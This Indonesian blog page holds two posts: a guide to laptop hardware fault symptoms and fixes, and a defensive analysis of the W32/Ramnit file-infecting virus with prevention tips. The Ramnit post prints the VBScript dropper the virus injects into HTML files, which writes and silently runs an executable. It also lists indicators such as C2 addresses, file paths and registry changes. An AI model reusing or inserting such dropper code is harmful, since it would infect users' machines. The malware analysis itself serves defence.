Friday, November 21, 2014

Ciri Ciri Kerusakan Pada Laptop/ Notebook

Posted by Fikridamanjayaaa on 11/21/2014 03:34:00 PM with No comments



1. Ciri Kerusakan LCD Laptop / Notebook :

Layar tidak tampil gambar, menyala tapi keluar garis-garis vertikal, tampak blok hitam, dan gambar tidak simetris / acak.

Solusi : Matikan laptop dengan hard turn off (tekan tombol power sampai mati), lalu lepas baterai dan kabel chargernya, terus tekan tombol power off beberapa detik untuk menghilangkan muatan kapasitansi, terus pasang baterai dan kabelnya lagi, nyalakan laptop. Jika masih muncul, maka kemungkinan ada kerusakan hardware, coba cek dulu konektor ataupun soket-soket yang berhubungan dengan monitor atau sebaiknya bawa ke service center resmi.

2. Ciri Kerusakan Keyboard Laptop / Notebook :

Beberapa tuts tidak berfungsi, keluar bunyi beep panjang pada saat laptop dinyalakan, cursor berjalan tidak stabil / bergerak sendiri.
Kerusakan yang lebih parah biasanya terjadi konslet dan ini menyebabkan Laptop / Notebook setelah booting, restart-restart terus.

Solusi : Coba bongkar keyboard laptop, bersihkan dengan penyedot debu, atau bila anda sanggup bongkar semua dan periksa apakah ada circuit yang putus atau ada kotoran yang menempel, bila sudah circuit laptop ada yang putus anda terpaksa beli keyboard yang baru

3. Ciri Kerusakan Memory Laptop / Notebook :

Pada saat dihidupkan tidak tampak tampilan sama sekali, blue screen pada saat mulai loading Operating System. Bisa juga keluar suara beep berulang-ulang.

Solusi : Cabut memory laptop, bersihkan dan pasang lagi, apabila tidak bisa juga, coba ganti dengan memory yang baru

 4. Ciri Kerusakan Motherboard / IC regulator Laptop / Notebook :

Dihidupkan agak sulit, baterai tidak mau discharge, Mati Total. Indikator charger menyala, setelah dicarge lampu indikator pada charger mati (konslet). Berarti terjadi arus balik pada powernya. Kerusakan ini sering terjadi.
kerusakan ini terjadi biasanya pada chipset

Solusi : periksa di sekitarnya apakah ada kapasitor yang mengembung, segera ganti kalau anda sanggup menggantinya atau bawa ke tempat service
Chipset terlalu panas, berarti overhad dan chipset tersebut sudah rusak, anda bawa ke service center
Periksa juga dibagian Circuit power supply, apakah ada jalur cricuit yang putus atau komponen yang hangus

5. Ciri Kerusakan Charger Laptop / Notebook :

Baterai tidak mau di charge, tidak ada indikator masuk power, laptop di charge posisi hidup malah kemudian mati. Layar bergetar tidak stabil.

Solusi : Bila anda mampu bongkar dan coba ganti komponen yang rusak di dalam charger tesebut, bisanya kerusakan pada dioda, transistor atau capasitor

6. Ciri Kerusakan Hardisk Laptop / Notebook :

Loading data / System lambat, berbunyi tidak normal, tidak bisa masuk windows, belum sampai login windows sudah restart sendiri, Tidak terdeteksi
penyebabnya
§        Kemungkinan bila pembacaan data lambat, hardisk anda sudah melemah, dimana tidak sanggup lagi memutar piringan data atau head tidak bisa cepat membaca data pada piringan tersebut
§        Bila sering restart, kemungkinan hardisk sudah ada bad sector sehingga, saat system membaca file system dan tidak ditemukan, maka system akan restart
§       Tidak terdetek, kemungkinan power circuit pada hdd sudah rusak atau frimewarenya rusak sehingga hdd tidak terdetek oleh bios

Solusi : periksa hubungan hardisk dengan soket
periksa apakah hdd terdengar bunyi keras, bila terdengar bunyi keras dan berisik maka kemungkinan ada bad sector
Segera backup data anda, sebelum hardisk anda mati total, dan siapkan hardisk baru

7. Ciri Kerusakan Chipset / VGA Laptop / Notebook :

Layar tidak tampil, Layar Putih, garis garis warna tidak beraturan.
Solusi : kerusakan ini tidak dapat diperbaiki secara manual, anda segara bawa ke cervice center terdekat

8. Laptop Panas / Overheat dan Cara Penanganannya.

Langsung ke pokok permasalahan OVERHEATING atau laptop panas / suhu laptop tidak stabil yang menyebabkan laptop mati mendadak.
  
Kondisi Laptop :

  Nyala Normal
§      CPU usage 90-100%
§      Suhu Laptop 60-90 Derajat
§      10 Menit - 1 Jam atau Lebih MATI Mendadak

Laptop panas / overheat bisa dikarenakan ventilasi untuk aliran udara dan kipas pendingin tersumbat debu untuk itu kita akan membersihkannya. Sebelum masuk ke cara penanganannya, sebaiknya untuk melakukan ini di dampingi oleh orang yang ahli dibidangnya atau kalau kamu merasa telah berpengalaman simak langkah penanganannya baik baik :

§       Buka Laptop / Bongkar Laptop Total
§       Bersihkan Fan dari debu
§       Bila Pasta / Thermal Kering, Ganti dengan Thermalpad atau Thermal paste Yang Baru

9. Masalah Port dan Konektor Power

Masalah ini juga sering terjadi. Hal ini diakibatkan oleh retaknya solderan yang ada di konektor ataupun port tersebut. Retaknya solderan disebabkan oleh panas dan umur dari laptop itu sendiri.
Solusinya adalah melakukan solder ulang terhadap bagian yang mengalami keretakan solderan.

10. Ciri-ciri kerusakan baterai laptop

- Laptop mendeteksi baterai tetapi mati ketika AC adaptor dicabut.

Bila Anda memindahkan kursor panah diatas ikon baterai ketika laptop terhubung ke adaptor AC, komputer menunjukkan informasi daya baterai tersisa dan mengatakan "pengisian pengisian baterry sedang terjadi".
Kekuatan adonan meteran listrik (jika tersedia) juga menunjukkan bahwa baterai terhubung dan terjadi pengisian.
Tapi ... segera setelah Anda cabut adaptor AC, laptop mati sepenuhnya.

Kemungkinan masalah:
  1. Posisi Baterai tidak masuk dengan benar. Coba hubungkan kembali baterai.
  2. Kontak baterai terdapat kotoran atau teroksidasi dan baterai tidak terhubungan dengan baik pada motherboard. Coba menghubungkan kembali baterai beberapa kali.
  3. Jika memasang kembali baterai tidak membantu, kemungkinan besar baterai yang buruk alias uzur dan harus diganti.
  4. Jika anda mengganti baterai tapi masalahnya masih ada. Rupanya sirkuit pengisian baterai telah rusak. Dalam hal ini seluruh motherboard harus diganti (atau diperbaiki).

- Baterai tidak terdeteksi oleh laptop.

Baterai terpasang dan kau tahu itu terhubung dengan benar tetapi ada sebuah salib merah pada ikon baterai.
Jika Anda memindahkan panah kursor di atas ikon baterai, ia mengatakan "baterai tidak terdeteksi".

Kemungkinan masalah:
  1. Kemungkinan besar baterai yang buruk. Anda memiliki kesempatan sangat baik untuk memperbaiki masalah ini dengan mengganti baterai.
  2. Jika mengganti baterai tidak membantu, ini adalah motherboard kegagalan terkait. Motherboard harus diganti (atau diperbaiki pada tingkat komponen).

- Pemakaian/Penggunaan/Discharge baterai yang sangat cepat setelah mencapai beberapa titik kritis.

Baterai terdeteksi oleh laptop dan indikator level menunjuk ke 100%. Saat Anda mencabut adaptor AC, diperlukan waktu normal untuk debit/pengisian sampai beberapa titik kritis (katakanlah 80%) tetapi setelah itu pemakaian/penggunaan/discharge baterai sangat cepat ke level 0%.

Kemungkinan masalah:
Ini adalah kerusakan baterai. Kondisi baterai buruk dan harus diganti.

- Pengisian/Charge Baterai hanya terjadi jika steker listrik posisi yang benar.

Anda harus menggoyangkan steker listrik untuk dapat mengisi baterai. Setelah Anda menemukan posisi yang tepat, baru baterai mengisi dengan benar.

Kemungkinan masalah:
  1. Adaptor AC gagal. Adaptor AC kabel listrik rusak. Anda dapat menguji adaptor AC dengan voltmeter.
  2. Jika adaptor AC bekerja dengan baik, kemungkinan besar ini adalah kekuatan jack (konektor yang Anda pasang diadaptor daya) mengalami kegagalan. Dalam hal ini colokan listrik harus diganti. Pada beberapa model laptop colokan listrik tidak disolder ke motherboard, itu hanya melekat dan memanfaatkan kekuatan soket.
Dalam hal ini, Anda dapat mencabut colokan listrik dari motherboard yang rusak dan menggantinya dengan yang baru.


Dokumen ini sebagai gambaran keadaan yang sering terjadi, kerusakan komponen laptop tergantung dari cara menggunakan laptop itu sendiri oleh si pengguna/si pemakai

Thursday, November 20, 2014

Pengertian Tentang RAMNIT Dan Cara Pencegahan nya

Posted by Fikridamanjayaaa on 11/20/2014 11:26:00 PM with No comments


W32/Ramnit, Kini dengan kemampuan eksploitasi LNK (Shortcut)

Kalau Christiano Ronaldo di ibaratkan sebagai Stuxnet, tentu anda bertanya virus apa yang diibaratkan sebagai Messi ? Jawabannya adalah Ramnit. Walaupun tidak eksplosif seperti Stuxnet, namun dengan kemampuan yang tidak kalah dengan Stuxnet dalam injeksi file korbannya, Ramnit jelas menginfeksi banyak komputer di Indonesia dan pelan tapi pasti mengokohkan dirinya sebagai salah satu virus jawara yang pelru diwaspadai oleh pengguna komputer di Indonesia. Apalagi varian teranyar Ramnit yang sekarang memiliki kemampuan mengeksploitasi celah keamanan LNK (Shortcut) sehingga ia mampu menyebarkan dirinya dengan membuat Shortcut.
Di tahun 2010 lalu, dominasi stuxnet yang memanfaatkan celah keamanan LNK (shortcut) merupakan sebuah salah satu langkah kerja cerdas dari pembuat malware. Bukan hanya sekedar mendominasi, tetapi juga menjadi trending topik malware di berbagai artikel dan analisis di seluruh dunia.
Di saat dominasi stuxnet masih booming hingga saat ini, sebaiknya kita perlu waspada pula terhadap varian malware baru yang berusaha menunjukkan eksistensi-nya dengan usaha kerja keras dari pembuat malware. Diantara varian malware yang patut di waspadai adalah yang terdeteksi sebagai W32/Ramnit oleh Norman Security Suite.  Saat ini varian malware ramnit telah menyebar dengan cepat di seluruh dunia. Serangan ramnit ikut melengkapi dominasi malware mancanegara yang menyebar di Indonesia.

A.Keluarga malware W32/Ramnit

Malware ramnit sesungguhnya bukanlah kelompok malware yang baru, melainkan sudah aktif menyebar pula di tahun 2010. Hanya karena adanya malware pengguna celah keamanan LNK seperti shortcut, sality, stuxnet, yang membuat malware ini tidak menjadi perhatian para analisis dan pengguna komputer di dunia.
Sama seperti stuxnet, varian pertama W32/Ramnit muncul pada pertengahan Juli dan Agustus 2010. Sedangkan varian kedua W32/Ramnit muncul pada Oktober dan Nopember 2010, bersamaan dengan heboh-nya serangan sality-shortcut. Dan pada pertengahan Januari 2011 saat ini yang muncul adalah varian ketiga dari keluarga W32/Ramnit yang mencoba mengikuti jejak para pendahulunya dengan menggunakan celah keamanan LNK (shortcut) untuk melakukan infeksi dan penyebaran.

B.Karakteristik W32/Ramnit

Salah satu hal yang membuat kita perlu hati-hati terhadap W32/Ramnit yaitu karena malware ini termasuk kelompok virus yang melakukan infeksi file seperti Sality, Virut dan Alman. Hal ini bisa menjadi momok buat pengguna komputer, karena akan sulit membersihkan virus yang melakukan infeksi file terutama file executable (application).
W32/Ramnit merupakan salah satu varian virus yang melakukan infeksi file executable (application). Dan tidak hanya file executable, tetapi juga melakukan infeksi terhadap file web (HTML) dan file DLL (dynamic link library).
Selain itu, jika anda terhubung ke internet, ramnit akan menghubungi remote server (IRC server) dan melakukan koneksi ke beberapa alamat server zombie untuk mendownload sekumpulan malware (virus, trojan, spyware). Pada beberapa waktu tertentu, W32/Ramnit menggunakan iklan dan popup dengan konten pornografi dan perjudian (casino) maupun iklan komersial lain yang tentunya membuat anda tidak nyaman saat hendak browsing maupun surfing. Bayangkan kalau hal ini terjadi pada saat anak anda yang dibawah umur sedang menggunakan komputer yang anda proteksi dengan Parental Control. Bagi orang tua ini bencana karena anak anda terpapar pornografi (karena kemungkinan besar konten porno yang ditampilkan akan lolos dari Parental Control yang di pasang) dan bagi anak hal ini bisa-bisa dianggap "berkah" karena proteksi pornografi yang di pasang ternyata bisa diakali.
Dengan turut memanfaatkan celah keamanan LNK (shortcut), maka makin mempermudah langkahnya untuk menginfeksi pengguna komputer dengan cepat. Walaupun tidak semua varian ketiga W32/Ramnit menggunakan celah keamanan LNK (shortcut), tetapi hampir semua varian W32/Ramnit akan sangat sulit dibersihkan.

C.Gejala & Efek W32/Ramnit

Beberapa gejala yang terjadi jika anda sudah terinfeksi yaitu :

1.Muncul pop-up iklan atau pop-up dengan konten pornografi/perjudian

Dalam beberapa waktu tertentu, browser akan membuka pop-up iklan atau pop-up yang berisi konten pornografi atau perjudian (casino). Hal ini yang terkadang membuat pengguna komputer menjadi tidak nyaman.

2.Muncul script error atau pop-up error setelah pop-up iklan yang muncul

Setelah pop-up iklan yang muncul, akan muncul pop-up error atau script error dari browser. Muncul-nya script error ini mirip seperti virus "ARP Spoofing" pada tahun 2008.

3.Infeksi file EXE dan DLL

Sama seperti varian malware sality, alman dan virut, W32/Ramnit melakukan infeksi file exe. Hanya saja, W32/Ramnit juga melakukan infeksi terhadap file DLL (dynamic load library).
File exe dan dll yang di-infeksi bertambah sekitar antara 100 - 120 kb, tergantung varian Ramnit yang menginfeksi. Meskipun begitu, tidak semua file exe dan dll yang di-infeksi.

4.Injeksi file HTML

Selain menginfeksi file exe dan dll, W32/Ramnit juga melakukan injeksi terhadap file HTML. Injeksi dilakukan dengan menambahkan pada header dan footer.
Pada header, W32/Ramnit menambahkan script :
DropFileName = "svchost.exe"
Sedangkan pada footer, W32/Ramnit menambahkan script :
Set FSO = CreateObject ("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & '\" DropFileName
If FSO.FileExists(DropPath)=False Then
Set fileobj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step2
Fileobj.write chr (CLng("&H" & Mid(WriteData, i,2)))
Next
Fileobj.close
End If
Set WSHshell = CreateObject ("Wscript.shell")
WSHshell.Run DropPath, 0

5.Membuat fungsi services Windows menjadi blank

Dengan aksi melakukan injeksi file pada file IEXPLORE.EXE dan file services.exe, serta menambahkan script pada file web (htm/html) membuat fungsi dari services Windows menjadi blank.

6.Membuat komputer hang/lambat dan bahkan koneksi jaringan menjadi terputus.

File sistem Windows yang akan menjadi sasaran injeksi W32/Ramnit yaitu :
C:\WINDOWS\system32\svchost.exe (file sistem yang berhubungan dengan koneksi jaringan, dengan menginjeksi akan membuat jaringan terputus)
C:\WINDOWS\system32\lsass.exe (file sistem yang berhubungan dengan aktifitas komputer, dengan menginjeksi akan membuat komputer hang/lambat).
C:\WINDOWS\system32\services.exe (file sistem yang berhubungan dengan services dan driver yang berjalan)
C:\Program Files\Internet Explorer\IEXPLORE.EXE (file executable dari browser internet explorer)

7.Aktif pada proses memory

Malware W32/Ramnit mencoba melakukan koneksi ke Remote Server menggunakan Internet Explorer yang telah di injeksi. Hal ini bisa kita lihat pada proses task manager, walaupun kita tidak sedang membuka IE / Internet Explorer.

8.Melakukan koneksi ke Remote Server

Malware W32/Ramnit melakukan koneksi ke Remote Server untuk melakukan pengiriman informasi yang dibutuhkan pada Remote Server. Remote Server yang digunakan yaitu diantara-nya :
195.2.252.247
195.2.252.252
69.50.193.157
74.125.227.17
74.125.227.18
74.125.227.20
95.211.127.69

9.Melakukan transfer data ke Remote Server

Selain mencoba melakukan koneksi dan ber-komunikasi dengan remote server, W32/Ramnit juga mencoba melakukan transfer data dari komputer korban ke Remote Server dan sebaliknya mengirim file malware ke dalam komputer korban.

10.Melakukan broadcast

Sama seperti hal-nya worm Conficker, W32/Ramnit juga melakukan broadacast pada jaringan. Yang ber-beda adalah untuk W32/Ramnit hanya melakukan pada satu alamat yaitu : ADX.ADNXS.COM

D.File virus W32/Ramnit

Malware W32/Ramnit dibuat menggunakan bahasa pemrograman C yang dikompres menggunakan UPX. File malware memiliki ciri sebagai berikut :
§        Berukuran 105 kb
§        Type file "Application'
§         Menggunakan icon "folder music"
§        Extension "exe"
Saat W32/Ramnit dijalankan, maka akan menginjeksi beberapa file sistem Windows yaitu :

C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\services.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE

Jika terkoneksi ke internet, W32/Ramnit akan mendownload beberapa file dan folder malware sebagai berikut :

C:\Documents and Settings\%user%\Local Settings\Temp\[angka].tmp
C:\Documents and Settings\%user%\Local Settings\Temp\explorer.dat
C:\Documents and Settings\%user%\Local Settings\Temp\winlogon.dat
C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe
C:\Documents and Settings\%user%\Start Menu\Programs\[nama_acak].exe
C:\Program Files\Intenet Explorer\complete.dat
C:\Program Files\Intenet Explorer\dmlconf.dat
C:\Program Files\win\[angka_acak].exe
C:\Program Files\qwe
C:\WINDOWS\[nama_acak].exe
C:\WINDOWS\System32\[nama_acak].dll
C:\WINDOWS\System32\[nama&angka_acak].dll
C:\WINDOWS\Temp\[angka].tmp

Selain itu, W32/Ramnit melakukan injeksi terhadap beberapa file berikut (jika ada) yaitu :

C:\contacts.html
C:\Inetpub\wwwroot\index.html
C:\Program Files\Common Files\designer\MSADDNDR.DLL
C:\Program Files\Common Files\designer\MSHTMPGD.DLL
C:\Program Files\Common Files\designer\MSHTMPGR.DLL
C:\Program Files\Common Files\System\ado\MDACReadme.htm
C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL
C:\Program Files\MSN\MSNCoreFiles\OOBE\obelog.dll
C:\Program Files\MSN\MSNCoreFiles\OOBE\obemetal.dll
C:\Program Files\MSN\MSNCoreFiles\OOBE\obepopc.dll
C:\Program Files\MSN\MSNIA\custdial.dll
C:\Program Files\MSN\MSNIA\msniasvc.exe
C:\Program Files\MSN\MSNIA\prestp.exe
C:\Program Files\MSN\MsnInstaller\iasvcstb.dll
C:\Program Files\MSN\MsnInstaller\msdbxi.dll
C:\Program Files\MSN\MsnInstaller\msninst.dll
C:\Program Files\MSN\MsnInstaller\msninst.exe
C:\Program Files\MSN\MsnInstaller\msnsign.dll
C:\Program Files\NetMeeting\netmeet.htm

Selain itu pada removable disk/drive akan membuat beberapa file yaitu :

autorun.inf
Copy of Shortcut to (1).lnk
Copy of Shortcut to (2).lnk
Copy of Shortcut to (3).lnk
Copy of Shortcut to (4).lnk
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak1].exe
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak2].exe
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak3].exe
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak4].exe
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak5].exe
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak6].exe
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak7].exe
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak8].exe
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak9].exe
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak10].exe
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak11].exe
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak1].cpl
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak2].cpl
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak3].cpl
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak4].cpl
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak5].cpl
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak6].cpl
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak7].cpl
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak8].cpl
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak9].cpl
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak10].cpl
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak11].cpl
<Rem. Drive :>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak1].exe
<Rem. Drive :>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak2].exe
<Rem. Drive :>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak3].exe
<Rem. Drive :>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak4].exe
<Rem. Drive :>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak5].exe
<Rem. Drive :>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak6].exe
<Rem. Drive :>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak7].exe
<Rem. Drive :>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak1].cpl
<Rem. Drive :>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak2].cpl
<Rem. Drive :>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak3].cpl
<Rem. Drive :>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak4].cpl
<Rem. Drive :>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak5].cpl
<Rem. Drive :>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak6].cpl
<Rem. Drive :>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak7].cpl

Serta pada jaringan yang menggunakan mapping drive, berusaha menginjeksi beberapa file yang 
memiliki nama berikut :

Blank.htm
Citrus Punch.htm
Clear Day.htm
Fiesta.htm
Ivy.htm
Leaves.htm
Maize.htm
Nature.htm
Network Blitz.htm
Pie Charts.htm
Sunflower.htm
Sweets.htm
Technical.htm

E.Modifikasi Registry

Beberapa modifikasi registry yang dilakukan oleh worm Stuxnet antara lain sebagai berikut :

-Menambah Registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[nama_acak] = C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol\FEATURE_BROWSER_EMULATION
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\international

-Menghapus Registry

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
 DisableSR = 0x00000001

-Merubah Registry

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
CurrentLevel =
1601 =

F.Metode Penyebaran

Beberapa cara W32/Ramnit melakukan penyebaran yaitu sebagai berikut :

-Drive by download (exploit)

W32/Ramnit awalnya menyebar dengan memanfaatkan fitur drive by download pada system Windows. Dengan link-link yang tersebar pada forum atau e-mail, berusaha mengelabui user untuk menjalankan link tersebut. Selain itu juga saat akses pada website-website yang menyediakan konten atau plugin browser untuk di-download.

-Removable drive/disk

Metode ini adalah metode yang umum dilakukan oleh para pengguna komputer. W32/Ramnit membuat banyak file agar menginfeksi komputer, serta ikut pula memanfaatkan celah keamanan LNK (shortcut).

-Jaringan

W32/Ramnit berusaha melakukan injeksi terhadap beberapa file web (htm) tertentu di jaringan pada komputer yang melakukan mapping drive. Berikut file-file tersebut :

Blank.htm
Citrus Punch.htm
Clear Day.htm
Fiesta.htm
Ivy.htm
Leaves.htm
Maize.htm
Nature.htm
Network Blitz.htm
Pie Charts.htm
Sunflower.htm
Sweets.htm
Technical.htm

G.Tips Pencegahan dari Malware W32/Ramnit
§        
      Aktifkan Windows Firewall atau gunakan software firewall yang lain. Hal ini untuk mencegah dari akses yang tidak di-inginkan
§        Pastikan komputer sudah mendapatkan update terbaru dari system Windows. Untuk mempermudah gunakan update otomatis dari system seperti "Automatic Updates". Atau bisa juga dengan men-download patch terbaru dari website Microsoft.
§        Gunakan antivirus yang selalu terupdate dengan baik. Hal ini untuk mempermudah terhadap varian-varian dari malware yang baru.
§        Batasi akses terhadap akses administrator. Bagi pengguna Windows 7 dan Vista, pastikan UAC (User Account Control) telah berjalan dengan baik.
§        Berhati-hati saat membuka file attachment e-mail atau saat menerima transfer file dari orang yang tidak dikenal. Pastikan selalu di scan dengan antivirus yang terupdate.
§       Berhati-hati terhadap program crack/keygen atau program-program yang tidak dikenal. Karena bisa saja sudah terinfeksi atau mengandung malware.
§       Gunakan password yang tidak mudah dibaca dan diketahui. Pastikan selalu rubah password pada waktu-tertentu, dan bedakan password satu dengan lain-nya.
§        Matikan fitur "autoplay" Windows untuk mencegah program yang tidak diinginkan pada removable drive/disk berjalan secara otomatis
§        Matikan file sharing jika tidak digunakan. Jika memang menggunakan file sharing hanya berstatus read-only, atau konfigurasi sharing hanya untuk user-user tertentu.

§        Berhati-hati saat mengakses sebuah website atau forum yang menyediakan link-link tertentu untuk di-download atau di-install
Subscribe to: Posts (Atom)